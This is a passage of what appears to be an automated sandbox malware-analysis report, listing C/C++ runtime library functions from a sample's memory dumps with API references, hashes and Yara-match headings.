std::_Facet_Register.LIBCPMT ref: 004997EA
std::_Lockit::~_Lockit.LIBCPMT ref: 0049980A
Concurrency::cancel_current_task.LIBCPMT ref: 00499817

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Registermoneypunct
String ID:
API String ID: 1799738296-0
Opcode ID: 151a5cb6a0bbab467bee6533aeea040cd029332179a6ab3da36f8b9fa95dc6b4
Instruction ID: 49ac802887d0621467d1e4e35387ffc2160dcd53cc5cd5c6759d1e4b805c01c3
Opcode Fuzzy Hash: 151a5cb6a0bbab467bee6533aeea040cd029332179a6ab3da36f8b9fa95dc6b4
Instruction Fuzzy Hash: 6901C475D002159BCF05FB69D9596BE7BA5AF80314F14086FE4106B392CF7C9D01C799

Uniqueness

Uniqueness Score: -1.00%

Function 004301CC, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004301D3
__Getcvt.LIBCPMT ref: 004301E5
__Getcvt.LIBCPMT ref: 0043020D

Strings

false, xrefs: 00430228
true, xrefs: 0043023A

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Getcvt$H_prolog3_
String ID: false$true
API String ID: 4085572910-2658103896
Opcode ID: ea4191a211f3c7b8b38784d1ff0e0f436af73cb0f23fbff5d976b9e803d5be47
Instruction ID: 677c1ce155cf09159817d19818d2668137ab5584c5fc0557ba10d4e1fab97d9e
Opcode Fuzzy Hash: ea4191a211f3c7b8b38784d1ff0e0f436af73cb0f23fbff5d976b9e803d5be47
Instruction Fuzzy Hash: 96214FB1D00748AFDB20EFF5D891A5FBBBCAB08304F04866FB565D7242D73899048B69

Uniqueness

Uniqueness Score: -1.00%

Function 0049289C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004928A3
__Getcvt.LIBCPMT ref: 004928B1

Part of subcall function 004302EE: _strlen.LIBCMT ref: 004302F4

Part of subcall function 0048BAE8: _Maklocstr.LIBCPMT ref: 0048BB08
Part of subcall function 0048BAE8: _Maklocstr.LIBCPMT ref: 0048BB25
Part of subcall function 0048BAE8: _Maklocstr.LIBCPMT ref: 0048BB42
Part of subcall function 0048BAE8: _Maklocchr.LIBCPMT ref: 0048BB54
Part of subcall function 0048BAE8: _Maklocchr.LIBCPMT ref: 0048BB67

_Mpunct.LIBCPMT ref: 00492930
_Mpunct.LIBCPMT ref: 0049294A

Strings

$+xv, xrefs: 00492955

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Maklocstr$MaklocchrMpunct$GetcvtH_prolog3_strlen
String ID: $+xv
API String ID: 3506764189-1686923651
Opcode ID: 91cecb4d499f96e0331ccc3c769fc6d9dcb1a8bb90a5d6f7f655957ee20a7b2d
Instruction ID: d4007caeb0ed6ab0e23313825519e23d98435ac1e76fd6f7e882ab886e41fa89
Opcode Fuzzy Hash: 91cecb4d499f96e0331ccc3c769fc6d9dcb1a8bb90a5d6f7f655957ee20a7b2d
Instruction Fuzzy Hash: 9821C7B1904B566EDB25DF76849077BBEF8AB0D304F04052FE499C7A42D778DA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0049AB98, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0049AB9F
__Getcvt.LIBCPMT ref: 0049ABAD

Part of subcall function 004302EE: _strlen.LIBCMT ref: 004302F4

_Mpunct.LIBCPMT ref: 0049AC2C
_Mpunct.LIBCPMT ref: 0049AC46

Strings

$+xv, xrefs: 0049AC51

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Mpunct$GetcvtH_prolog3_strlen
String ID: $+xv
API String ID: 556337393-1686923651
Opcode ID: a66196ce39e1a9263a0aa6c799fc6fe6719f95adc7c728b3e08afca19ddad0e4
Instruction ID: cd7b428007d03788b8c8db4644eff112bf5fded5e64f55c7bce39db12e2ec46d
Opcode Fuzzy Hash: a66196ce39e1a9263a0aa6c799fc6fe6719f95adc7c728b3e08afca19ddad0e4
Instruction Fuzzy Hash: 4521B2B1904A526FDB25DF75849073BBEE8AB09304F04056FE499C7A41D738EA11CBD8

Uniqueness

Uniqueness Score: -1.00%

Function 004A2462, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

api-ms-, xrefs: 004A24B2

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: api-ms-
API String ID: 0-2084034818
Opcode ID: 6963f5687abb0d6ecace8804441a3a01e6670674e1813b39ff9e09bf696a2d23
Instruction ID: 324a4d6c85cd4d0aea7481a2e7f9ac2525ae29bc4bbb8420414100d22a9db64b
Opcode Fuzzy Hash: 6963f5687abb0d6ecace8804441a3a01e6670674e1813b39ff9e09bf696a2d23
Instruction Fuzzy Hash: E8110B71901231AFCB214B6C9E84A6B7764BF6B760F110122ED06A73D1D7B8ED00F6E8

Uniqueness

Uniqueness Score: -1.00%

Function 004B0C60, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004B0C11,00000003,?,004B0BB1,00000003,004E89F0,0000000C,004B0D08,00000003,00000002), ref: 004B0C80
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004B0C93
FreeLibrary.KERNEL32(00000000,?,?,?,004B0C11,00000003,?,004B0BB1,00000003,004E89F0,0000000C,004B0D08,00000003,00000002,00000000), ref: 004B0CB6

Strings

CorExitProcess, xrefs: 004B0C8B
mscoree.dll, xrefs: 004B0C79

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 84ea29d2f6881c555eeec16bfdf63e0f05d61cd99ea8e22627ac04bfe5a9458c
Instruction ID: 8938192068963d438bd1a0fc93c17aa07ef176bfda181c6866d4004622b7486e
Opcode Fuzzy Hash: 84ea29d2f6881c555eeec16bfdf63e0f05d61cd99ea8e22627ac04bfe5a9458c
Instruction Fuzzy Hash: 90F04430900208BBCB159F55DD49BEFBFB4EB44752F1101B9F805A22A1DB755E51CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004BA809, Relevance: 7.7, APIs: 5, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30ed0bbcf0de32e444eb33d3f5346a159205abe7248db323fa11171b21c369f2
Instruction ID: ddc576a32ebdafd09095a34f68f2b6f29bfa588e1a39cd6722ece1fd737be22f
Opcode Fuzzy Hash: 30ed0bbcf0de32e444eb33d3f5346a159205abe7248db323fa11171b21c369f2
Instruction Fuzzy Hash: B371E4719002169BCF21DF98C984AFFBB75EF45350F14462BE41197240DB789DA2CBBA

Uniqueness

Uniqueness Score: -1.00%

Function 0048B17E, Relevance: 7.7, APIs: 5, Instructions: 170COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,00000001,?,00000000,00000000,?,?,?,?,?,?,00489765,?,00000100,?), ref: 0048B1C6
MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,?,00000000,00000000,?,00489765,?,00000100,?,00000001,?,00000003,?,00000001), ref: 0048B236
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000003,?,00000000,00000000,?,?,?,?,?,?,00000003,?), ref: 0048B30C
__freea.LIBCMT ref: 0048B315
__freea.LIBCMT ref: 0048B320

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide$__freea
String ID:
API String ID: 2689816821-0
Opcode ID: b9d30f539dcb44216b945bbca25cbd7eed0011ee1e442aa81e2f5a3ade58ef38
Instruction ID: 45602fa319eb1bf5145415592d81df9cc6df781351c0f92366ce01b590d408ed
Opcode Fuzzy Hash: b9d30f539dcb44216b945bbca25cbd7eed0011ee1e442aa81e2f5a3ade58ef38
Instruction Fuzzy Hash: FD51F37250020AAFEF20AF65CC85EAF3AADEF45794F14092AFD0496251D7389C118BE8

Uniqueness

Uniqueness Score: -1.00%

Function 004BC482, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 004BC48B
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004BC4AE

Part of subcall function 004B3009: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004BAEA8,00000000,?,004AB16D,?,00000008,?,004AD0C1,?,?,00000000), ref: 004B303B

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004BC4D4
_free.LIBCMT ref: 004BC4E7
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004BC4F6

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: e7d9735fa3406c8a8ff0c51866abfd5a2a6044e8094706601699605635b00c80
Instruction ID: d685d3e4a0e6254c29c856ed2b6bf389cebcf065de041d1dd6e98631fecc06ef
Opcode Fuzzy Hash: e7d9735fa3406c8a8ff0c51866abfd5a2a6044e8094706601699605635b00c80
Instruction Fuzzy Hash: C1018472601616BF273116BB6DDCCFB7A6DDEC2BA5316052BBD04D2205DE688E02C1B9

Uniqueness

Uniqueness Score: -1.00%

Function 00483AE0, Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00483AE7
std::_Lockit::_Lockit.LIBCPMT ref: 00483AF4

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 00483B47
std::_Lockit::~_Lockit.LIBCPMT ref: 00483B83
Concurrency::cancel_current_task.LIBCPMT ref: 00483B90

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2687776920-0
Opcode ID: 27863822ff5fddab39fb780662e3abb8cd09823af2c3e27421d52e8f3e26a775
Instruction ID: 71df51e63383c82d6613613f72a55524ffaf3c518d96626f5c7c2fbd04fbbec9
Opcode Fuzzy Hash: 27863822ff5fddab39fb780662e3abb8cd09823af2c3e27421d52e8f3e26a775
Instruction Fuzzy Hash: 05219071E002199BCB05FFA5D5456AFB7B4EF08714F60056FE414AB2C2DB3C9E058B99

Uniqueness

Uniqueness Score: -1.00%

Function 0042FD2A, Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0042FD31
std::_Lockit::_Lockit.LIBCPMT ref: 0042FD3E

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0042FD91
std::_Lockit::~_Lockit.LIBCPMT ref: 0042FDCD
Concurrency::cancel_current_task.LIBCPMT ref: 0042FDDA

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2687776920-0
Opcode ID: b42b39c63098b4e66bb8208c3d7fb7bbe50a00d123d7e24f32644ba0a8f7bbd7
Instruction ID: 21837085d009165f1aa416735b22d1fa0337be0389476ff367f177046396bb4e
Opcode Fuzzy Hash: b42b39c63098b4e66bb8208c3d7fb7bbe50a00d123d7e24f32644ba0a8f7bbd7
Instruction Fuzzy Hash: 1B21DF31E0021A9FCB04EFA5E4456EEB7B4AF04714FA0412FE515AB2C2DB3C9E058F98

Uniqueness

Uniqueness Score: -1.00%

Function 0042FE86, Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0042FE8D
std::_Lockit::_Lockit.LIBCPMT ref: 0042FE9A

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0042FEED
std::_Lockit::~_Lockit.LIBCPMT ref: 0042FF29
Concurrency::cancel_current_task.LIBCPMT ref: 0042FF36

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2687776920-0
Opcode ID: e1fe4d562fe0ae853163a3da7a14a0b384e572139f5f4e73f70563a75e3870c3
Instruction ID: 81ea1123f81f8e3d168c477dc80079d897b05023751513951002d9ccbf9808e8
Opcode Fuzzy Hash: e1fe4d562fe0ae853163a3da7a14a0b384e572139f5f4e73f70563a75e3870c3
Instruction Fuzzy Hash: A121F331E0021A9FDB04EFA595456AEB774AF04314FA0013FF411AB282DF385E068B98

Uniqueness

Uniqueness Score: -1.00%

Function 00433006, Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0043300D
std::_Lockit::_Lockit.LIBCPMT ref: 0043301A

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0043306D
std::_Lockit::~_Lockit.LIBCPMT ref: 004330A9
Concurrency::cancel_current_task.LIBCPMT ref: 004330B6

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$H_prolog3_Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2687776920-0
Opcode ID: 47d17ada41617051c4e826c128848fcfaee918a060b064c64cdafa41d6349d30
Instruction ID: 07115667762014d115be0965e30639c84d16096a2aff31e3f5105c38e37937e2
Opcode Fuzzy Hash: 47d17ada41617051c4e826c128848fcfaee918a060b064c64cdafa41d6349d30
Instruction Fuzzy Hash: ED21D231E002099FCB04EFA6D5456AEB7B4AF08324F60412FE415AB282CB3C9E058B99

Uniqueness

Uniqueness Score: -1.00%

Function 0048BAE8, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 0048BB08
_Maklocstr.LIBCPMT ref: 0048BB25
_Maklocstr.LIBCPMT ref: 0048BB42
_Maklocchr.LIBCPMT ref: 0048BB54
_Maklocchr.LIBCPMT ref: 0048BB67

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Maklocstr$Maklocchr
String ID:
API String ID: 2020259771-0
Opcode ID: e2955a98c508f2e844fe341b7860e06c510415416389584fadc6d7d48f7dcc5c
Instruction ID: 1ab497323cbdf39865de47dc4c966775a270c3ec26ced47c98b89d2a594a10ce
Opcode Fuzzy Hash: e2955a98c508f2e844fe341b7860e06c510415416389584fadc6d7d48f7dcc5c
Instruction Fuzzy Hash: 7B118CB1500744BFE720EBA59881F17B7ECEB09318F04491AF1448BA41D379F85587E9

Uniqueness

Uniqueness Score: -1.00%

Function 004B369F, Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,004A9673,004B2FC4,?,004B3649,00000001,00000364,?,004AADF3,004E8890,00000010), ref: 004B36A4
_free.LIBCMT ref: 004B36D9
_free.LIBCMT ref: 004B3700
SetLastError.KERNEL32(00000000), ref: 004B370D
SetLastError.KERNEL32(00000000), ref: 004B3716

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: fe5a8f25dc7bd61731958d548abc2dbec8ad2b7e0b583f1bfe4b3e034bad444d
Instruction ID: e1328e283a6145c89ce7de1091a7158b06c6ea683bcad14b8debd2d008ca1ea3
Opcode Fuzzy Hash: fe5a8f25dc7bd61731958d548abc2dbec8ad2b7e0b583f1bfe4b3e034bad444d
Instruction Fuzzy Hash: 4601D6B22046017782162F276CC99AB17299BC17BA720012FF41592393EF6D8E11A17D

Uniqueness

Uniqueness Score: -1.00%

Function 004B361B, Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,004AADF3,004E8890,00000010), ref: 004B361F
_free.LIBCMT ref: 004B3652
_free.LIBCMT ref: 004B367A
SetLastError.KERNEL32(00000000), ref: 004B3687
SetLastError.KERNEL32(00000000), ref: 004B3693

Memory Dump Source

Source File: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.220624239.00000000004F0000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 80681aed1ebbdbf9e37771f6e4a181b27628dd189edb97250e841e296d38d27b
Instruction ID: c60173b9f30aed35b07b92e7144c1115af7263850a4d9f9e5fa1a6372c7f02d1
Opcode Fuzzy Hash: 80681aed1ebbdbf9e37771f6e4a181b27628dd189edb97250e841e296d38d27b
Instruction Fuzzy Hash: B7F0F43510460036C3223B2B6C09FEB13259FD17B6B25022FF41892392EF2D8E0291BD

Uniqueness

Uniqueness Score: -1.00%

Function 004998B2, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004998B9
std::_Lockit::_Lockit.LIBCPMT ref: 004998C3

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 00499914
std::_Lockit::~_Lockit.LIBCPMT ref: 00499934
Concurrency::cancel_current_task.LIBCPMT ref: 00499941

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: 0e9bd867374baf6000a31275340e654b5b7aea78279cd26d6454baf336a4bb18
Instruction ID: f48d92260b285a688d3f172a5cfa79e7b510e4c62925896f1aaef37141bc9d65
Opcode Fuzzy Hash: 0e9bd867374baf6000a31275340e654b5b7aea78279cd26d6454baf336a4bb18
Instruction Fuzzy Hash: 8401A172D002158BCF15FB6998996BE7B61AF90318F54042EE4116B392CF7C9D01C799

Uniqueness

Uniqueness Score: -1.00%

Function 00499947, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0049994E
std::_Lockit::_Lockit.LIBCPMT ref: 00499958

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 004999A9
std::_Lockit::~_Lockit.LIBCPMT ref: 004999C9
Concurrency::cancel_current_task.LIBCPMT ref: 004999D6

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: 0daafc2dec987b19df32decd132da27655d4e0972ca025a0e5a46bea218a48e9
Instruction ID: 58302f9919c5a46ba8c60c13022793c9855dc3c5662e0e09ac0ca11f89d5a2fc
Opcode Fuzzy Hash: 0daafc2dec987b19df32decd132da27655d4e0972ca025a0e5a46bea218a48e9
Instruction Fuzzy Hash: 38010471D001158BCF01FB6AD85A6BE7B61AF90314F14441FE4116B382CF7C9D01CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0048CA8E, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048CA95
std::_Lockit::_Lockit.LIBCPMT ref: 0048CA9F

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0048CAF0
std::_Lockit::~_Lockit.LIBCPMT ref: 0048CB10
Concurrency::cancel_current_task.LIBCPMT ref: 0048CB1D

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: 02663d46bd9c07ad8c8a235627f5ab71225bb9e7f2a485408051f7273ab4dd3d
Instruction ID: a7a15d95216993b99ba8e90ec71ce381733d70cc155042a2120f37279bda4077
Opcode Fuzzy Hash: 02663d46bd9c07ad8c8a235627f5ab71225bb9e7f2a485408051f7273ab4dd3d
Instruction Fuzzy Hash: D101C475D005198BCB05FB65E85A6BE7761AF80714F14481FE4116B3D2CF7C9D01C799

Uniqueness

Uniqueness Score: -1.00%

Function 0048CB23, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048CB2A
std::_Lockit::_Lockit.LIBCPMT ref: 0048CB34

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0048CB85
std::_Lockit::~_Lockit.LIBCPMT ref: 0048CBA5
Concurrency::cancel_current_task.LIBCPMT ref: 0048CBB2

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: 279528fea0e826c42f7cd90493ac86173f5d7e35c76eccb7b557a0c2ec52c703
Instruction ID: 3dd892e0772eddc7054554b0902ad7e6281940cfcea5854e0b39ab2737061eef
Opcode Fuzzy Hash: 279528fea0e826c42f7cd90493ac86173f5d7e35c76eccb7b557a0c2ec52c703
Instruction Fuzzy Hash: 61010471D005158BCB01FBA5E856ABE7770AF84714F54094FE4116B382CF3C9E00C799

Uniqueness

Uniqueness Score: -1.00%

Function 0048CBB8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048CBBF
std::_Lockit::_Lockit.LIBCPMT ref: 0048CBC9

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0048CC1A
std::_Lockit::~_Lockit.LIBCPMT ref: 0048CC3A
Concurrency::cancel_current_task.LIBCPMT ref: 0048CC47

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: b256264d93bca9508cb44720cae6e44c06a111bc019737db483cc462bc28a1ed
Instruction ID: 510b584475f0b4ab2b12819a85194bdfaf119ca4a28ecfc60026ba2dec7a6381
Opcode Fuzzy Hash: b256264d93bca9508cb44720cae6e44c06a111bc019737db483cc462bc28a1ed
Instruction Fuzzy Hash: 9B01C031D002198BCB05FBA9E9596BE77A1AF90318F54485FE810AB392CF7C9E01C799

Uniqueness

Uniqueness Score: -1.00%

Function 0048CC4D, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0048CC54
std::_Lockit::_Lockit.LIBCPMT ref: 0048CC5E

Part of subcall function 0042B22E: __EH_prolog3_GS.LIBCMT ref: 0042B235
Part of subcall function 0042B22E: std::_Lockit::_Lockit.LIBCPMT ref: 0042B246
Part of subcall function 0042B22E: std::_Lockit::~_Lockit.LIBCPMT ref: 0042B268

std::_Facet_Register.LIBCPMT ref: 0048CCAF
std::_Lockit::~_Lockit.LIBCPMT ref: 0048CCCF
Concurrency::cancel_current_task.LIBCPMT ref: 0048CCDC

Memory Dump Source

Source File: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.482704528.00000000004F0000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3H_prolog3_Register
String ID:
API String ID: 1813952879-0
Opcode ID: e19b08316931a09d210142fa29a39eb4fd7c28283043ba3cfacaad745288eb28
Instruction ID: a09a396f34704b041d7832a82a42cf76a4e71d69e7351eae3f27ab7c02dba916
Opcode Fuzzy Hash: e19b08316931a09d210142fa29a39eb4fd7c28283043ba3cfacaad745288eb28
Instruction Fuzzy Hash: 4201C436D001158BCB06FB65D9556BE7761AF44314F15085FE4156B382CF3C9E018799

Uniqueness

Uniqueness Score: -1.00%

Function 0048CE0C, Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

